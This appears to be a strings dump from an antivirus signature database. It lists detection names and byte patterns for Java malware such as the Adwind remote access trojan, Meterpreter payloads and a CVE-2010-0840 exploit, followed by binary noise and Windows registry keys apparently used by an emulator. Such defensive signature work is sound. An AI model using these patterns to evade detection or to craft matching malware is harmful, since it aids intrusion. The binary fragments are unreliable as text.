!#HSTR:JAVA:Feature:M:185 !#HSTR:JAVA:Feature:M:186 !#HSTR:JAVA:Feature:M:188 !#HSTR:JAVA:Feature:M:191 !#HSTR:JAVA:Feature:M:192 !#HSTR:JAVA:Feature:M:196 !#HSTR:JAVA:Feature:M:198 !#HSTR:JAVA:Feature:M:199 !#HSTR:JAVA:Feature:M:201 !#HSTR:JAVA:Feature:M:202 !#HSTR:JAVA:Feature:M:205 !#HSTR:JAVA:Feature:M:206 !#HSTR:JAVA:Feature:M:207 !#HSTR:JAVA:Feature:M:209 !#HSTR:JAVA:Feature:M:210 !#HSTR:JAVA:Feature:M:211 !#HSTR:JAVA:Feature:M:212 !#HSTR:JAVA:Feature:M:213 !#HSTR:JAVA:Feature:M:218 !#HSTR:JAVA:Feature:M:220 !#HSTR:JAVA:Feature:M:222 !#HSTR:JAVA:Feature:M:223 !#HSTR:JAVA:Feature:M:229 !#HSTR:JAVA:Feature:M:230 !#HSTR:JAVA:Feature:M:231 !#HSTR:JAVA:Feature:M:232 !#HSTR:JAVA:Feature:M:233 !#HSTR:JAVA:Feature:M:238 !#HSTR:JAVA:Feature:M:243 !#HSTR:JAVA:Feature:M:246 !#HSTR:JAVA:Feature:M:249 !#HSTR:JAVA:Feature:M:250 !#HSTR:JAVA:Feature:M:253 !#HSTR:JAVA:Feature:M:254 !#HSTR:JAVA:Feature:M:255 !#HSTR:JAVA:Feature:M:260 !#HSTR:JAVA:Feature:M:261 !#HSTR:JAVA:Feature:M:264 !#HSTR:JAVA:Feature:M:267 !#HSTR:JAVA:Feature:M:270 !#HSTR:JAVA:Feature:M:271 !#HSTR:JAVA:Feature:M:272 !#HSTR:JAVA:Feature:M:273 !#HSTR:JAVA:Feature:M:275 !#HSTR:JAVA:Feature:M:277 !#HSTR:JAVA:Feature:M:278 !#HSTR:JAVA:Feature:M:280 !#HSTR:JAVA:Feature:M:281 !#HSTR:JAVA:Feature:M:282 !#HSTR:JAVA:Feature:M:287 !#HSTR:JAVA:Feature:M:288 !#HSTR:JAVA:Feature:M:290 !#HSTR:JAVA:Feature:M:292 !#HSTR:JAVA:Feature:M:294 !#HSTR:JAVA:Feature:M:298 !#HSTR:JAVA:Feature:M:299 !#HSTR:JAVA:Feature:M:300 !#HSTR:JAVA:Feature:M:302 !#HSTR:JAVA:Feature:M:304 !#HSTR:JAVA:Feature:M:308 !#HSTR:JAVA:Feature:M:311 !#HSTR:JAVA:Feature:M:313 !#HSTR:JAVA:Feature:M:314 !#HSTR:JAVA:Feature:M:315 !#HSTR:JAVA:Feature:M:320 !#HSTR:JAVA:Feature:M:321 !#HSTR:JAVA:Feature:M:322 !#HSTR:JAVA:Feature:M:323 !#HSTR:JAVA:Feature:M:324 !#HSTR:JAVA:Feature:M:325 !#HSTR:JAVA:Feature:M:326 !#HSTR:JAVA:Feature:M:327 !#HSTR:JAVA:Feature:M:328 !#HSTR:JAVA:Feature:M:332 !#HSTR:JAVA:Feature:M:333 !#HSTR:JAVA:Feature:M:336 !#HSTR:JAVA:Feature:M:339 !#HSTR:JAVA:Feature:M:341 !#HSTR:JAVA:Feature:M:343 !#HSTR:JAVA:Feature:M:344 !#HSTR:JAVA:Feature:M:346 !#HSTR:JAVA:Feature:M:347 !#HSTR:JAVA:Feature:M:348 !#HSTR:JAVA:Feature:M:349 !#HSTR:JAVA:Feature:M:350 !#HSTR:JAVA:Feature:M:352 !#HSTR:JAVA:Feature:M:353 !#HSTR:JAVA:Feature:M:355 !#HSTR:JAVA:Feature:M:357 !#HSTR:JAVA:Feature:M:358 !#HSTR:JAVA:Feature:M:359 !#HSTR:JAVA:Feature:M:363 !#HSTR:JAVA:Feature:M:364 !#HSTR:JAVA:Feature:M:365 !#HSTR:JAVA:Feature:M:368 !#HSTR:JAVA:Feature:M:371 !#HSTR:JAVA:Feature:M:372 !#HSTR:JAVA:Feature:M:374 !#HSTR:JAVA:Feature:M:377 !#HSTR:JAVA:Feature:M:381 !#HSTR:JAVA:Feature:M:382 !#HSTR:JAVA:Feature:M:383 !#HSTR:JAVA:Feature:M:384 !#HSTR:JAVA:Feature:M:385 !#HSTR:JAVA:Feature:M:387 !#HSTR:JAVA:Feature:M:391 !#HSTR:JAVA:Feature:M:393 !#HSTR:JAVA:Feature:M:394 !#HSTR:JAVA:Feature:M:399 !#HSTR:JAVA:Feature:M:402 !#HSTR:JAVA:Feature:M:403 !#HSTR:JAVA:Feature:M:405 !#HSTR:JAVA:Feature:M:406 !#HSTR:JAVA:Feature:M:408 !#HSTR:JAVA:Feature:M:411 !#HSTR:JAVA:Feature:M:412 !#HSTR:JAVA:Feature:M:413 !#HSTR:JAVA:Feature:M:414 !#HSTR:JAVA:Feature:M:415 !#HSTR:JAVA:Feature:M:417 !#HSTR:JAVA:Feature:M:420 !#HSTR:JAVA:Feature:M:422 !#HSTR:JAVA:Feature:M:423 !#HSTR:JAVA:Feature:M:424 !#HSTR:JAVA:Feature:M:425 !#HSTR:JAVA:Feature:M:430 !#HSTR:JAVA:Feature:M:431 !#HSTR:JAVA:Feature:M:432 !#HSTR:JAVA:Feature:M:433 !#HSTR:JAVA:Feature:M:436 !#HSTR:JAVA:Feature:M:439 !#HSTR:JAVA:Feature:M:440 !#HSTR:JAVA:Feature:M:441 !#HSTR:JAVA:Feature:M:442 !#HSTR:JAVA:Feature:M:445 !#HSTR:JAVA:Feature:M:448 !#HSTR:JAVA:Feature:M:449 !#HSTR:JAVA:Feature:M:450 !#HSTR:JAVA:Feature:M:451 !#HSTR:JAVA:Feature:M:453 !#HSTR:JAVA:Feature:M:454 !#HSTR:JAVA:Feature:M:455 !#HSTR:JAVA:Feature:M:456 !#HSTR:JAVA:Feature:M:458 !#HSTR:JAVA:Feature:M:460 !#HSTR:JAVA:Feature:M:461 !#HSTR:JAVA:Feature:M:462 !#HSTR:JAVA:Feature:M:464 !#HSTR:JAVA:Feature:M:467 !#HSTR:JAVA:Feature:M:468 !#HSTR:JAVA:Feature:M:472 !#HSTR:JAVA:Feature:M:474 !#HSTR:JAVA:Feature:M:475 !#HSTR:JAVA:Feature:M:476 !#HSTR:JAVA:Feature:M:479 !#HSTR:JAVA:Feature:M:485 !#HSTR:JAVA:Feature:M:486 !#HSTR:JAVA:Feature:M:488 !#HSTR:JAVA:Feature:M:494 !#HSTR:JAVA:Feature:M:495 !#HSTR:JAVA:Feature:M:496 !#HSTR:JAVA:Feature:M:497 !#HSTR:JAVA:Feature:M:499 !#HSTR:JAVA:Feature:M:501 !#HSTR:JAVA:Feature:M:505 !#HSTR:JAVA:Feature:M:506 !#HSTR:JAVA:Feature:M:507 !#HSTR:JAVA:Feature:M:508 !#HSTR:JAVA:Feature:M:511 !#HSTR:JAVA:Feature:M:514 !#HSTR:JAVA:Feature:M:515 !#HSTR:JAVA:Feature:M:516 !#HSTR:JAVA:Feature:M:521 !#HSTR:JAVA:Feature:M:522 !#HSTR:JAVA:Feature:M:523 !#HSTR:JAVA:Feature:M:524 !#HSTR:JAVA:Feature:M:525 !#HSTR:JAVA:Feature:M:527 !#HSTR:JAVA:Feature:M:528 !#HSTR:JAVA:Feature:M:532 !#HSTR:JAVA:Feature:M:533 !#HSTR:JAVA:Feature:M:534 !#HSTR:JAVA:Feature:M:535 !#HSTR:JAVA:Feature:M:536 !#HSTR:JAVA:Feature:M:541 !#HSTR:JAVA:Feature:M:542 !#HSTR:JAVA:Feature:M:547 !#HSTR:JAVA:Feature:M:550 !#HSTR:JAVA:Feature:M:552 !#HSTR:JAVA:Feature:M:553 !#HSTR:JAVA:Feature:M:554 !#HSTR:JAVA:Feature:M:555 !#HSTR:JAVA:Feature:M:557 !#HSTR:JAVA:Feature:M:558 !#HSTR:JAVA:Feature:M:561 !#HSTR:JAVA:Feature:M:563 !#HSTR:JAVA:Feature:M:565 !#HSTR:JAVA:Feature:M:567 !#HSTR:JAVA:Feature:M:571 !#HSTR:JAVA:Feature:M:572 !#HSTR:JAVA:Feature:M:574 !#HSTR:JAVA:Feature:M:578 !#HSTR:JAVA:Feature:M:579 !#HSTR:JAVA:Feature:M:580 !#HSTR:JAVA:Feature:M:583 !#HSTR:JAVA:Feature:M:584 !#HSTR:JAVA:Feature:M:585 !#HSTR:JAVA:Feature:M:586 !#HSTR:JAVA:Feature:M:589 !#HSTR:JAVA:Feature:M:590 !#HSTR:JAVA:Feature:M:591 !#HSTR:JAVA:Feature:M:594 !#HSTR:JAVA:Feature:M:595 !#HSTR:JAVA:Feature:M:596 !#HSTR:JAVA:Feature:M:597 !#HSTR:JAVA:Feature:M:599 !#HSTR:JAVA:Feature:M:600 !#HSTR:JAVA:Feature:M:602 !#HSTR:JAVA:Feature:M:604 !#HSTR:JAVA:Feature:M:605 !#HSTR:JAVA:Feature:M:606 !#HSTR:JAVA:Feature:M:608 !#HSTR:JAVA:Feature:M:609 !#HSTR:JAVA:Feature:M:610 !#HSTR:JAVA:Feature:M:611 !#HSTR:JAVA:Feature:M:615 !#HSTR:JAVA:Feature:M:616 !#HSTR:JAVA:Feature:M:617 !#HSTR:JAVA:Feature:M:619 !#HSTR:JAVA:Feature:M:620 !#HSTR:JAVA:Feature:M:621 !#HSTR:JAVA:Feature:M:622 !#HSTR:JAVA:Feature:M:623 !#HSTR:JAVA:Feature:M:626 !#HSTR:JAVA:Feature:M:627 !#HSTR:JAVA:Feature:M:629 !#HSTR:JAVA:Feature:M:630 !#HSTR:JAVA:Feature:M:631 !#HSTR:JAVA:Feature:M:632 !#HSTR:JAVA:Feature:M:637 !#HSTR:JAVA:Feature:M:638 !#HSTR:JAVA:Feature:M:640 !#HSTR:JAVA:Feature:M:641 !#HSTR:JAVA:Feature:M:645 !#HSTR:JAVA:Feature:M:647 !#HSTR:JAVA:Feature:M:650 !#HSTR:JAVA:Feature:M:652 !#HSTR:JAVA:Feature:M:653 !#HSTR:JAVA:Feature:M:659 !#HSTR:JAVA:Feature:M:660 !#HSTR:JAVA:Feature:M:661 !#HSTR:JAVA:Feature:M:662 !#HSTR:JAVA:Feature:M:663 !#HSTR:JAVA:Feature:M:668 !#HSTR:JAVA:Feature:M:670 !#HSTR:JAVA:Feature:M:674 !#HSTR:JAVA:Feature:M:675 !#HSTR:JAVA:Feature:M:676 !#HSTR:JAVA:Feature:M:678 !#HSTR:JAVA:Feature:M:679 !#HSTR:JAVA:Feature:M:680 !#HSTR:JAVA:Feature:M:681 !#HSTR:JAVA:Feature:M:682 !#HSTR:JAVA:Feature:M:683 !#HSTR:JAVA:Feature:M:684 !#HSTR:JAVA:Feature:M:685 !#HSTR:JAVA:Feature:M:686 !#HSTR:JAVA:Feature:M:688 !#HSTR:JAVA:Feature:M:690 !#HSTR:JAVA:Feature:M:695 !#HSTR:Java/inflate.A inflate !#Base64_DumpJavaClass yv66vgAA !#HSTR:JAVA:Feature:C:194 depen !#HSTR:JAVA:Feature:C:317 ingle !#HSTR:JAVA:Feature:C:318 ionlj !#HSTR:JAVA:Feature:M:173 ninth !#HSTR:JAVA:Feature:M:189 etkpo !#HSTR:JAVA:Feature:M:219 ter&( !#HSTR:JAVA:Feature:M:265 ethod !#HSTR:JAVA:Feature:M:428 emget !#HSTR:JAVA:Feature:M:487 ime;( !#HSTR:JAVA:Feature:M:566 end-( !#ALF:Java:Adwind com/hack/Main$ !#ALFPER:HSTR:JvBanload.T squirrel123 !#Base64_DumpJavaSerializedClass rO0ABXVy !#ALF:HSTR:Trojan:Java/Adwind.AP!bit !#SLF:Java/Meterpreter.A (Lcom/metasploit/meterpreter/ !#ALF:HSTR:Trojan:Java/Adwind.AM!bit Loperational/JRat; !#ALF:HSTR:Trojan:Java/Adwind.AR!bit 5bqc0eu382hckds9ub !#java:do_deep_rescan !#HSTR:CVE-2010-0840_Sig !#Exploit:Java/PrevalentPattern 153615BC3ABB59B73A123612361515A0 !#ALF:HSTR:Trojan:Java/Adwind.AQ!bit 1e7skijgl7n6iflppd4aprf7qgb 124CBB592AB7B6B64B2A2B12B64B2AB8B0 1536190332B6B6B8B83A123612361515A0 1904321903322AB62D2CB82AB62D2CB8A7 19B619B6B8BB59B712B8B612B6B6B657A7 5911105459111054591110545911105459 BB59B719B62D1C32B8046092B6B63A84A7 com/metasploit/meterpreter/stdapi/stdapi_ 153619B619073203BDB63A123612361515A0 153619B619073203BDB63A133613361515A0 15362DBB5919B7B63AB83A123612361515A0 15362DBB5919B7B63AB83A133613361515A0 2A2BB52AB72A12B52A12B52A12B52A2CB5B1 2C1D2B051D68051D680560B610B8915484A7 59B65FB65B57B65FB6B65AB65F645A3E4D36 B215B21533B282B2649154B20460B38415A7 BB592AB6BC045958105F59BE04645B3E4C3D !#ALF:HSTR:Java:Adwind!enc.1 !#ALF:HSTR:Java:Adwind!enc.2 15362B2AB63A113615116836123612361515A0 2DB83A2A2B190319BEB8B6572A2B04B63A19B0 \\y? - Y? ;G 3H? ]w J;k? gJ;k? h f8? Q ~b? H 6[? < cmX; ,cmX; 'I\\H> 3V]o? Z7'? oZ7'? 0wL? 0wL? a 3| ? 3| ? N 4-? . 6=N6[? U>5'? ev;%s? d]o? d]o? a 89H?\t > &,89H?\t ?@g]o? W`Bar? bo7'? n[{q? xd?k? 8zl6l -3? < u\"a? 6W? - \\Ec? <? 3+ >?<3-? rs:cL? eyroot VSYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{AD498944-762F-11D0-8DCB-00C04FC3358C} VSYSTEM\\CurrentControlSet\\control\\deviceclasses\\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} VSYSTEM\\CurrentControlSet\\control\\deviceclasses\\{dda54a40-1e4c-11d1-a050-405705c10000} VSYSTEM\\CurrentControlSet\\control\\deviceclasses\\{f18a0e88-c30c-11d0-8815-00a0c906bed8} Vsystem\\currentcontrolset\\control\\deviceclasses\\{4afa3d53-74a7-11d0-be5e-00a0c9062857} Vsystem\\currentcontrolset\\control\\deviceclasses\\{4d36e978-e325-11ce-bfc1-08002be10318} Vsystem\\currentcontrolset\\control\\deviceclasses\\{53172480-4791-11d0-a5d6-28db04c10000} 4clsid\\{ecabb0be-7f19-11d2-978e-0000f8757e2a}\\ProgID HCrmRecoveryClerk.CrmRecoveryClerk.1 <CLSID\\{000C1094-0000-0000-C000-000000000046}\\InprocServer32 8C:\\Windows\\system32\\msi.dll <CLSID\\{13AA3650-BB6F-11D0-AFB9-00AA00B67A42}\\InprocServer32 8C:\\Windows\\System32\\qdv.dll <CLSID\\{2DB47AE5-CF39-43C2-B4D6-0CD8D90946F4}\\InprocServer32 8C:\\Windows\\System32\\sbe.dll <CLSID\\{4EB31670-9FC6-11CF-AF6E-00AA00B67A42}\\InprocServer32 <CLSID\\{6CFAD761-735D-4AA5-8AFC-AF91A7D61EBA}\\InprocServer32 <CLSID\\{B1B77C00-C3E4-11CF-AF79-00AA00B67A42}\\InprocServer32 <CLSID\\{C9F5FE02-F851-4EB5-99EE-AD602AF1E619}\\InprocServer32 <clsid\\{289228de-a31e-11d1-a19c-0000f875b132}\\inprocserver32 8c:\\windows\\System32\\cic.dll <clsid\\{3d112e22-62b2-11d1-9fef-00600832db4a}\\inprocserver32 <clsid\\{4150f050-bb6f-11d0-afb9-00aa00b67a42}\\inprocserver32 8C:\\WINDOWS\\system32\\qdv.dll <clsid\\{44ec053a-400f-11d0-9dcd-00a0c90391d3}\\inprocserver32 8C:\\WINDOWS\\system32\\ATL.DLL Fclsid\\{2206cdb3-19c1-11d1-89e0-00c04fd7a829}\\versionindependentprogid $MSDASCErrorLookup Fclsid\\{410381db-af42-11d1-8f10-00c04fc2c17b}\\versionindependentprogid $COMSNAP.COMNSView Fclsid\\{4662daaa-d393-11d0-9a56-00c04fb68bf7}\\versionindependentprogid $ITIR.LocalCatalog Fclsid\\{4662daae-d393-11d0-9a56-00c04fb68bf7}\\versionindependentprogid $ITIR.PropertyList Fclsid\\{4662dab0-d393-11d0-9a56-00c04fb68b66}\\versionindependentprogid $HHCtrl.SYstemSort Fclsid\\{adb880a4-d8ff-11cf-9377-00aa003b7a11}\\versionindependentprogid $HHCtrl.FileFinder Gclsid\\{ef636390-f343-11d0-9477-00c04fd36226}\\\\VersionIndependentProgID \"DBRSTPRX.AsProxy /SOFTWARE\\Microsoft\\Internet Explorer\\AboutURLs PostNotCached8res://mshtml.dll/repost.htm BSOFTWARE\\classes\\Interface\\{00000132-0000-0000-c000-000000000046} ,ILocalSystemActivator Gsoftware\\microsoft\\internet explorer\\advancedoptions\\multimedia\\animat uncheckedvalue KSOFTWARE\\Classes\\CLSID\\{00020421-0000-0000-C000-000000000046}\\InprocServer ole2disp.dll VSoftware\\Classes\\CLSID\\{00000315-0000-0000-C000-000000000046}\\DataFormats\\DefaultFile WSOFTWARE\\Classes\\clsid\\{d7fcb63b-5c55-11d1-8f00-00c04fc2c17b}\\versionindependentprogid WSoftware\\Classes\\CLSID\\{00000514-0000-0010-8000-00AA006D2EA4}\\VersionIndependentProgID Wsystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicy\\domainprofile -CLSID\\{5cb66670-d3d4-11cf-acab-00a024a55aef} XCOM+ Extended Transaction Context Component ;CLSID\\{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}\\LocalServer32 <C:\\Windows\\System32\\mshta.exe <CLSID\\{1B544C22-FD0B-11CE-8C63-00AA0044B51F}\\InprocServer32 :C:\\Windows\\SysWOW64\\qcap.dll <CLSID\\{8596E5F0-0DA5-11D0-BD21-00A0C911CE86}\\InprocServer32 :C:\\Windows\\System32\\qcap.dll <CLSID\\{BF87B6E1-8C27-11d0-b3f0-00aa003761c5}\\InprocServer32 <clsid\\{6e8d4a20-310c-11d0-b79a-00aa003767a7}\\inprocserver32 :C:\\WINDOWS\\system32\\qdvd.dll <clsid\\{CD8743A1-3736-11d0-9E69-00C04FD7C15B}\\inprocserver32 <clsid\\{d76e2820-1563-11cf-ac98-00aa004c0fa9}\\inprocserver32 Fclsid\\{6bc098a7-0ce6-11d1-baae-00c04fc2e20d}\\versionindependentprogid &IAS.PolicyEnforcer Gclsid\\{7444C719-39BF-11D1-8CD9-00C04FC29D45}\\\\VersionIndependentProgID $CryptSig.CryptSig Gclsid\\{92ad68ab-17e0-11d1-b230-00c04fb9473f}\\\\VersionIndependentProgID $STClient.STClient 0SYSTEM\\CurrentControlSet\\Services\\RemoteStorage WindowsAPI>Network Connections Management 0system\\controlset001\\services\\netman\\parameters servicedll>c:\\windows\\System32\\netman.dll 2system\\currentcontrolset\\services\\bits\\parameters servicedll:C:\\WINDOWS\\system32\\qmgr.dll >SOFTWARE\\Classes\\AppID\\{ECABB0C3-7F19-11D2-978E-0000F8757E2A} 6ComEvents.ComServiceEvents >SOFTWARE\\Classes\\CLSID\\{00000542-0000-0010-8000-00AA006D2EA4} 6adodb error lookup service ASoftware\\Microsoft\\Windows\\CurrentVersion\\App Paths\\IEXPLORE.EXE 0C:\\WINDOWS\\iexplore.exe Dsoftware\\classes\\typelib\\{3d5905e0-523c-11d1-9fea-00600832db4a}\\1.0 *cic 1.0 Type Library ESOFTWARE\\Classes\\CLSID\\{0000050B-0000-0010-8000-00AA006D2EA4}\\ProgID (adodb.parameter.2.8 Jsystem\\controlset001\\control\\class\\{4d36e97d-e325-11ce-bfc1-08002be10318} System devices Lsoftware\\classes\\typelib\\{7988b57c-ec89-11cf-9c00-00aa00a14f56}\\1.0\\0\\win32 dskquota.dll MSOFTWARE\\Classes\\CLSID\\{07D26616-6136-11D1-8C9C-00C04FC3261D}\\InprocServer32 CLBCatQ.dll MSoftware\\Classes\\CLSID\\{00000507-0000-0010-8000-00AA006D2EA4}\\InprocServer32 msado15.dll VSOFTWARE\\Classes\\CLSID\\{00000319-0000-0000-C000-000000000046}\\DataFormats\\DefaultFile WSOFTWARE\\Classes\\clsid\\{0003000a-0000-0000-c000-000000000046}\\conversion\\readable\\main XSYSTEM\\CurrentControlSet\\control\\mediacategories\\{2bc31d69-96e3-11d2-ac4c-00c04f8efb68} XSYSTEM\\CurrentControlSet\\control\\mediacategories\\{9db7b9e0-c555-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{00dff077-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{185fede5-9905-11d1-95a9-00c04fb925d3} Xsystem\\currentcontrolset\\control\\mediacategories\\{185fede6-9905-11d1-95a9-00c04fb925d3} Xsystem\\currentcontrolset\\control\\mediacategories\\{185fedfd-9905-11d1-95a9-00c04fb925d3} Xsystem\\currentcontrolset\\control\\mediacategories\\{1ad247eb-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{1ad247ec-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{1ad247ed-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{1e84c900-7e70-11d0-a5d6-28db04c10000} Xsystem\\currentcontrolset\\control\\mediacategories\\{20173f20-c559-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{22b0eafd-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{22b0eafe-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{2721ae20-7e70-11d0-a5d6-28db04c10000} Xsystem\\currentcontrolset\\control\\mediacategories\\{2bc31d6a-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{2bc31d6b-96e3-11d2-ac4c-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{2ceaf780-c556-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{2eb07ea0-7e70-11d0-a5d6-28db04c10000} Xsystem\\currentcontrolset\\control\\mediacategories\\{3a5acc00-c557-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{41887440-c558-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{423274a0-8b81-11d1-a050-0000f8004788} Xsystem\\currentcontrolset\\control\\mediacategories\\{4d837fe0-c555-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{507ae360-c554-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{55515860-c559-11d0-8a2b-00a0c9255ac1} Xsystem\\currentcontrolset\\control\\mediacategories\\{63ff5747-991f-11d2-ac4d-00c04f8efb68} Xsystem\\currentcontrolset\\control\\mediacategories\\{65e8773d-8f56-11d0-a3b9-00a0c9223196} Xsystem\\currentcontrolset\\control\\mediacategories\\{65e8773e- server32 <clsid\\{5a580c11-e5eb-11d1-a86e-0000f8084f96}\\inprocserver32 <clsid\\{5b035261-40f9-11d1-aaec-00805fc1270e}\\inprocserver32 <clsid\\{5b18ab61-091d-11d1-97df-00c04fb9618a}\\inprocserver32 <clsid\\{5e6ab780-7743-11cf-a12b-00aa004ae837}\\inprocserver32 <clsid\\{674b6698-ee92-11d0-ad71-00c04fd8fdff}\\inprocserver32 <clsid\\{6756a641-de71-11d0-831b-00aa005b4383}\\inprocserver32 <clsid\\{675f097e-4c4d-11d0-b6c1-0800091aa605}\\inprocserver32 <clsid\\{69a25c12-1811-11d2-a52b-0000f803a951}\\inprocserver32 <clsid\\{6a01fda0-30df-11d0-b724-00aa006c1a01}\\inprocserver32 <clsid\\{6bc096bc-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 <clsid\\{6bc096c6-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 <clsid\\{7ba4c740-9e81-11cf-99d3-00aa004ae837}\\inprocserver32 <clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32 <clsid\\{803e14a0-b4fb-11d0-a0d0-00a0c90f574b}\\inprocserver32 <clsid\\{819469d2-d0cf-11d1-8e0b-00c04fc2e0c7}\\inprocserver32 <clsid\\{8278f931-2a3e-11d2-838f-00c04fd918d0}\\inprocserver32 <clsid\\{877e4351-6fea-11d0-b863-00aa00a216a1}\\inprocserver32 <clsid\\{a9397d66-3ed3-11d1-8d99-00c04fc2e0c7}\\inprocserver32 <clsid\\{aa000926-ffbe-11cf-8800-00a0c903b83c}\\inprocserver32 <SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings <sOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced ,SYSTEM\\CurrentControlSet\\Control\\FileSystem Win31FileSystem 0system\\currentcontrolset\\control\\productoptions productsuite 3system\\currentcontrolset\\services\\rasauto\\security 3system\\currentcontrolset\\services\\spooler\\security 6SOFTWARE\\Microsoft\\DirectDraw\\Compatibility\\Terracide 9software\\microsoft\\directdraw\\compatibility\\nhlpowerplay <SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppPatches <SYSTEM\\CurrentControlSet\\Services\\lanmanworkstation\\linkage <SYSTEM\\CurrentControlSet\\Services\\remoteaccess\\interfaces\\0 <Software\\Classes\\Wordpad.Document.1\\Protocol\\StdFileEditing anifile FriendlyTypeNameL@%SystemRoot%\\system32\\main.cpl,-2000 ADsDSOObject bOLE DB Provider for Microsoft Directory Services protocols\\handler\\mk Rmk: Asychronous Pluggable Protocol Handl .aif\\PersistentHandler N{098f2470-bae0-11cd-b579-08002b30bfeb} .aps\\PersistentHandler .asf\\PersistentHandler .bin\\PersistentHandler .cgm\\PersistentHandler .com\\PersistentHandler .dic\\PersistentHandler .eps\\PersistentHandler .eyb\\PersistentHandler .hqx\\PersistentHandler .icm\\PersistentHandler .inf\\PersistentHandler N{5e941d80-bf96-11cd-b579-08002b30bfeb} .inv\\PersistentHandler .inx\\PersistentHandler .m1v\\PersistentHandler .mmf\\PersistentHandler .mov\\persistenthandler .mp3\\PersistentHandler .obj\\PersistentHandler .ocx\\PersistentHandler .pds\\PersistentHandler .pmc\\PersistentHandler .pml\\PersistentHandler .pmr\\PersistentHandler .reg\\persistenthandler .res\\PersistentHandler .rpc\\PersistentHandler .rsp\\PersistentHandler .sbr\\PersistentHandler .sc2\\PersistentHandler .tar\\PersistentHandler .tsp\\PersistentHandler .wlt\\PersistentHandler .xlb\\PersistentHandler .zip\\PersistentHandler AVIFile\\Extensions\\WAV N{00020003-0000-0000-C000-000000000046} IAS.Auditchannel\\CLSID N{6BC0969D-0CE6-11D1-BAAE-00C04FC2E20D} ias.ntsamperuser\\clsid N{6BC0989C-0CE6-11D1-BAAE-00C04FC2E20D} ias.sdomachine.1\\clsid N{E9218AE7-9E91-11D1-BF60-0080C7846BC0} ias.sdoservice.1\\clsid N{BC94D813-4D7F-11d2-A8C9-00AA00A71DCA} RowPosition.RowPosition LMicrosoft OLE DB Row Position Library \"mime\\database\\charset\\csisolatin1 windows-1252 -CLSID\\{54702535-2606-11d1-999c-0000f8756a10} \"Text Label Class -CLSID\\{55136805-b2de-11d1-b9f2-00a0c98bc547} \"Shell Name Space -clsid\\{0000002f-0000-0000-c000-000000000046} \"CLSID_RecordInfo -clsid\\{30c3b080-30fb-11d0-b724-00aa006c1a01} \"CoMapMIMEToCLSID -clsid\\{73fddc80-aea9-101a-98a7-00aa00374959} \"WordPad Document -clsid\\{cd000001-8b95-11d1-82db-00c04fb1625d} \"CDOMessage Class -clsid\\{ecabb0ac-7f19-11d2-978e-0000f8757e2a} \"MTSLocator Class -clsid\\{ef636392-f343-11d0-9477-00c04fd36226} \"OLE DB Row Proxy 1interface\\{00000125-0000-0000-c000-000000000046} IAdviseSink2 1interface\\{0000013c-0000-0000-c000-000000000046} IRemUnknownN 1interface\\{00000515-0000-0010-8000-00aa006d2ea4} Connection15 1interface\\{76a6415a-cb41-11d1-8b02-00600806d9b6} ISWbemObject 1interface\\{7bf80981-bf32-101a-8bbb-00aa00300cab} IPictureDisp 4clsid\\{3050f3d9-98b5-11cf-bb82-00aa00bdce0b}\\progid mhtmlfile 4clsid\\{9d148290-b9c8-11d0-a4cc-0000f80149f6}\\progid MSITFS1.0 4clsid\\{9d148291-b9c8-11d0-a4cc-0000f80149f6}\\progid 4clsid\\{d54eee56-aaab-11d0-9e1d-00a0c922e6ec}\\progid 5SOFTWARE\\Classes\\HTTP\\shell\\open\\ddeexec\\Application IExplore <interface\\{00020400-0000-0000-c000-000000000046}\\nummethods <interface\\{0c733a63-2a1c-11ce-ade5-00aa0044773d}\\nummethods =CLSID\\{05589FA1-C356-11CE-BF01-00AA0055595A}\\ToolBoxBitmap32 =clsid\\{545ae700-50bf-11d1-9fe9-00600832db4a}\\toolboxbitmap32 SOFTWARE\\WebMoney\\Path NC:\\Program Files\\WebMoney\\WebMoney.exe .SOFTWARE\\Microsoft\\Internet Explorer\\Settings Text Color 0,0,0 'software\\Microsoft\\Rpc\\ClientProtocols ncacn_ip_tcp *SOFTWARE\\Microsoft\\MSLicensing\\HardwareID ClientHWID BUG!.EXE 4system\\currentcontrolset\\services\\scardsvr\\security 6SYSTEM\\CurrentControlSet\\control\\safeboot\\network\\afd 6software\\microsoft\\windows nt\\currentversion\\winlogon taskman :software\\microsoft\\directdraw\\compatibility\\mortalkombat3 :software\\microsoft\\directdraw\\compatibility\\silentthunder =SYSTEM\\CurrentControlSet\\Control\\Session Manager\\DOS Devices =SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment =SYSTEM\\CurrentControlSet\\Services\\Dhcp\\Parameters\\Options\\15 =SYSTEM\\CurrentControlSet\\Services\\remoteaccess\\parameters\\ip protocols\\handler\\cdl RCDL: Asychronous Pluggable Protocol Hand protocols\\handler\\its Rits: Asychronous Pluggable Protocol Hand hhctrl.filefinder\\clsid 